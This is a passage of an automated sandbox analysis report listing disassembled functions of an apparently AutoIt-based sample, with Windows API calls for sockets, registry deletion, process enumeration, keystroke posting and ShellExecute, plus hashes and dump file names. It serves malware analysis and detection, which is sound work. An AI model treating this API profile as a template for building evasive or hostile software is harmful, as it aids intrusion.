#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006796E9
WSAGetLastError.WSOCK32(00000000), ref: 006796F8
htons.WSOCK32(?), ref: 006797AA
inet_ntoa.WSOCK32(?), ref: 00679765

Part of subcall function 0065D2FF: _strlen.LIBCMT ref: 0065D309

_strlen.LIBCMT ref: 00679800

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: d7e7f32f66efc814e48b8041f77622aab14526016766e5cd47be2fec6173a8f0
Instruction ID: 27b74ac8df34b857bcf7fba3496cfddd13449b3d31f15c8f1d47718d2df20cef
Opcode Fuzzy Hash: d7e7f32f66efc814e48b8041f77622aab14526016766e5cd47be2fec6173a8f0
Instruction Fuzzy Hash: C081E331504240ABC754EF64DC85EAFB7EAEF85710F108A1DF55A9B291EB30ED04CBA6

Function 0064A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0064A991

Part of subcall function 00647D7C: __FF_MSGBANNER.LIBCMT ref: 00647D91
Part of subcall function 00647D7C: __NMSG_WRITE.LIBCMT ref: 00647D98
Part of subcall function 00647D7C: __malloc_crt.LIBCMT ref: 00647DB8

__lock.LIBCMT ref: 0064A9A4
__lock.LIBCMT ref: 0064A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,006D6DE0,00000018,00655E7B,?,00000000,00000109), ref: 0064AA0C
EnterCriticalSection.KERNEL32(8000000C,006D6DE0,00000018,00655E7B,?,00000000,00000109), ref: 0064AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0064AA39

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 33318e0d3f499d3b059eca54510448181b5394d290e9561f73e7da0183d5b5f9
Instruction ID: ae88b7f6f2df1af99e766facc7bc04044ece9799091788fac596e9e9f7c7c45c
Opcode Fuzzy Hash: 33318e0d3f499d3b059eca54510448181b5394d290e9561f73e7da0183d5b5f9
Instruction Fuzzy Hash: FE412871A40301BBEB10DFE8DA8479CB7A3AF05325F10821CE425AB2D2D7B49D81CB86

Function 00688ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00688EE4
GetDC.USER32(00000000), ref: 00688EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00688EF7
ReleaseDC.USER32(00000000,00000000), ref: 00688F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00688F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00688F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0068BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00688F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00688FAA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 44434bc161efd85d249a45248f399cbf8b81192677b44aa508ff0434bf4cc363
Instruction ID: 42c285313cb74172ecc389cfded8ee62acceaeaa6fc7c639ae2c33870a9cdf29
Opcode Fuzzy Hash: 44434bc161efd85d249a45248f399cbf8b81192677b44aa508ff0434bf4cc363
Instruction Fuzzy Hash: B3317F72200214BFEB109F50CC49FEB3BAEEF4A755F045165FE09DA291CA75A841CB74

Function 00690133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

GetSystemMetrics.USER32(0000000F), ref: 0069016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0069038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006903AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 006903D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006903FF
ShowWindow.USER32(00000003,00000000), ref: 00690421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00690440

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 551bc81035e63065584a8a2876d497a040bf89693615e19a03d69e49134c4d41
Instruction ID: 8e5dea34e62a735482c34ff29afd0b1373e9fb84427dd1bb2d8ae75e247c8484
Opcode Fuzzy Hash: 551bc81035e63065584a8a2876d497a040bf89693615e19a03d69e49134c4d41
Instruction Fuzzy Hash: F2A18A35600616EFEF18CF68C9897FDBBBABF08700F088119E855AB690D734AD51DB90

Function 0063AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da073f705e5f5651661fee89212170a625f5a2c82acb6f6fc88a2ae23ce12e40
Instruction ID: 7428e45b26b6cc7d90780c306dfe499715c82d5bc991e15af3280761da693b63
Opcode Fuzzy Hash: da073f705e5f5651661fee89212170a625f5a2c82acb6f6fc88a2ae23ce12e40
Instruction Fuzzy Hash: 49716CB1900109EFCF14CF98CC89AEEBB7AFF85314F148149F955A6251C731AA42DFA5

Function 00682230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068225A
_memset.LIBCMT ref: 00682323
ShellExecuteExW.SHELL32(?), ref: 00682368

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717

CloseHandle.KERNEL32(00000000), ref: 0068242F
FreeLibrary.KERNEL32(00000000), ref: 0068243E

Strings

@, xrefs: 00682334

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 1a2a2bbdd83c3bcbc5ad30b54d7c86de280d66ec2f1dd2e2b249aa5d0f2c6139
Instruction ID: 5b3304c9eff9a87148446cf5f0b310a1f9385463c459a75e2191df79397fe398
Opcode Fuzzy Hash: 1a2a2bbdd83c3bcbc5ad30b54d7c86de280d66ec2f1dd2e2b249aa5d0f2c6139
Instruction Fuzzy Hash: FC715E7490062A9FCF15EF94D4A199EB7F6FF48310F108559E856AB351CB34AE40CF98

Function 00663BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00663C02
GetKeyboardState.USER32(?), ref: 00663C17
SetKeyboardState.USER32(?), ref: 00663C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00663CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00663CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00663D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00663D26

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d436d5ae40eb42f72a5c306e56d9ae383061df3f28853161b37b8cf0fa9c1017
Instruction ID: 6c10072c8ae512054ab4c7847a7b65379d2a4c8c3f604a301e2ef2f6ed1c405c
Opcode Fuzzy Hash: d436d5ae40eb42f72a5c306e56d9ae383061df3f28853161b37b8cf0fa9c1017
Instruction Fuzzy Hash: B151E5A09047E53DFB3287248C55BF6BFAAAF06304F08848CF1D556BC2D694EE84D760

Function 00683D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00683DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00683DCB
FreeLibrary.KERNEL32(00000000), ref: 00683E80

Part of subcall function 00683D72: RegCloseKey.ADVAPI32(?), ref: 00683DE8
Part of subcall function 00683D72: FreeLibrary.KERNEL32(?), ref: 00683E3A
Part of subcall function 00683D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00683E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00683E25

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 9d7e27c5a78834def05c6a90fb71cf60465ead2f7bd02a5228c8f8009edfc99c
Instruction ID: 41f6820daa4b9cbabcdd312c9751723a692278d9a131ba519f1eb468404e8d48
Opcode Fuzzy Hash: 9d7e27c5a78834def05c6a90fb71cf60465ead2f7bd02a5228c8f8009edfc99c
Instruction Fuzzy Hash: 6731FEB1901119BFDB15AF94DC89AFFB7BDEF09700F00026AE512E2251D674AF459B60

Function 00688FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00688FE7
GetWindowLongW.USER32(0127FFB0,000000F0), ref: 0068901A
GetWindowLongW.USER32(0127FFB0,000000F0), ref: 0068904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00689081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006890AB
GetWindowLongW.USER32(00000000,000000F0), ref: 006890BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006890D6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 603d1f74729362a3f8ef27679b04a6b864971aee0f35e9d046bd5af25dd72fa1
Instruction ID: 76a1ca5a37d7820cc690e3d94417ddec1581a8eb27760ac3cd2842d3338893f7
Opcode Fuzzy Hash: 603d1f74729362a3f8ef27679b04a6b864971aee0f35e9d046bd5af25dd72fa1
Instruction Fuzzy Hash: D1312474640215EFDB21AF58DC84FA437A6FB4A714F181268F61A8F2B1CBB1A840DF61

Function 006608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006608F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00660918
SysAllocString.OLEAUT32(00000000), ref: 0066091B
SysAllocString.OLEAUT32(?), ref: 00660939
SysFreeString.OLEAUT32(?), ref: 00660942
StringFromGUID2.OLE32(?,?,00000028), ref: 00660967
SysAllocString.OLEAUT32(?), ref: 00660975

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dc0323e5ad53aa919c7f48c99755ebb51f26efffe913c89fcf09d52160339d18
Instruction ID: 9664ee66962642ae3b2b2627589e6387099ae993d47fb39b7ceb3526bab9475b
Opcode Fuzzy Hash: dc0323e5ad53aa919c7f48c99755ebb51f26efffe913c89fcf09d52160339d18
Instruction Fuzzy Hash: B8219576601219AFAB10AF68CC88DEB73EEEB09360B009235F915DB251D674FC458BA4

Function 00662472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00662485
__wcsnicmp.LIBCMT ref: 006624A6
__wcsnicmp.LIBCMT ref: 006624C0

Strings

#notrayicon, xrefs: 0066247D
#OnAutoItStartRegister, xrefs: 006624BA
#requireadmin, xrefs: 006624A0

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: bbc66d0f1d75c2844b981270b395b265a8bbad925aabd8b6fcaa7f905c8bd783
Instruction ID: 5af5232c889acbd12e83b632181a1ae0f078e0cc9997306ed93a966ee9af1f09
Opcode Fuzzy Hash: bbc66d0f1d75c2844b981270b395b265a8bbad925aabd8b6fcaa7f905c8bd783
Instruction Fuzzy Hash: 15213A72544A1367D330AB24DD22EFB73DBEF65310F504029F4479B141EA659992C399

Function 00660986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006609CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006609F1
SysAllocString.OLEAUT32(00000000), ref: 006609F4
SysAllocString.OLEAUT32 ref: 00660A15
SysFreeString.OLEAUT32 ref: 00660A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00660A38
SysAllocString.OLEAUT32(?), ref: 00660A46

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 4ac1697ef53e69022aa649ad6c4d9fcc7d874bdaab2bbebbcb5f140c12b3bf77
Instruction ID: 091f8d77a352d59bd0f5743fdcbda82c49f8623ae5e243cfd9217f52c91a4db1
Opcode Fuzzy Hash: 4ac1697ef53e69022aa649ad6c4d9fcc7d874bdaab2bbebbcb5f140c12b3bf77
Instruction Fuzzy Hash: EE213575604204BFAB10EBE8DC89DAB77EEEF093607548135F909CB261EA74EC418B54

Function 0068A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0068A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0068A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0068A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0068A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0068A360

Strings

Msctls_Progress32, xrefs: 0068A2FE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 69e3ca74432be901d33994ff457c19b7ed0694ab5d29da92b7b46c7bdd7aac8c
Instruction ID: fdbdf3b3ae88055edfee016487b4b797f9ed65a6453e1e82350a6efd65673dd4
Opcode Fuzzy Hash: 69e3ca74432be901d33994ff457c19b7ed0694ab5d29da92b7b46c7bdd7aac8c
Instruction Fuzzy Hash: 7B1193B1150219BFEF115FA0CC85EEB7F6EFF09798F014215BA04A6160C6729C21DBA4

Function 0063CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0063CCF6
GetWindowRect.USER32(?,?), ref: 0063CD37
ScreenToClient.USER32(?,?), ref: 0063CD5F
GetClientRect.USER32(?,?), ref: 0063CE8C
GetWindowRect.USER32(?,?), ref: 0063CEA5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 5ac2baa790209f70878b83f276adf7b83470d598718fde168067fe51fbff7c9f
Instruction ID: 353538471af86b8577d6d6c0c9c55bd6ba40056b7436959131c1e5fb3517f2d6
Opcode Fuzzy Hash: 5ac2baa790209f70878b83f276adf7b83470d598718fde168067fe51fbff7c9f
Instruction Fuzzy Hash: 25B14879A00249DBDF10CFA8C4807EEBBB2FF08310F149529EC59EB654DB31A951DBA4

Function 00681BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00681C18
Process32FirstW.KERNEL32(00000000,?), ref: 00681C26
__wsplitpath.LIBCMT ref: 00681C54

Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C

_wcscat.LIBCMT ref: 00681C69
Process32NextW.KERNEL32(00000000,?), ref: 00681CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00681CF1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 656a5fdc250c3017bdd266626c06c7617952baad45e65aaffd3a9c53c1e67ded
Instruction ID: afe576b45bba455e93b7e16b721b850dacf67245684ace3c70d76c8af0a78549
Opcode Fuzzy Hash: 656a5fdc250c3017bdd266626c06c7617952baad45e65aaffd3a9c53c1e67ded
Instruction Fuzzy Hash: B6519EB11043009FD720EF24D881EABB7EDEF89754F004A1EF58A97251EB30EA05CB96

Function 00682FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006830AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006830EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00683112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0068313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0068317E
RegCloseKey.ADVAPI32(00000000), ref: 0068318B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 9f8d98869b46da68f11fec7a9c3c7ebbb2d01bf1f9713691fab730d4ad12f11f
Instruction ID: 0d2beaa8dafca427e965ec42fd44140d55e7938e12607002a864ccf07bc6a2a0
Opcode Fuzzy Hash: 9f8d98869b46da68f11fec7a9c3c7ebbb2d01bf1f9713691fab730d4ad12f11f
Instruction Fuzzy Hash: B7515831104210AFC744EF64C885EAEBBEAFF89714F044A1DF595872A1DB71EA05CF56

Function 006884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00688540
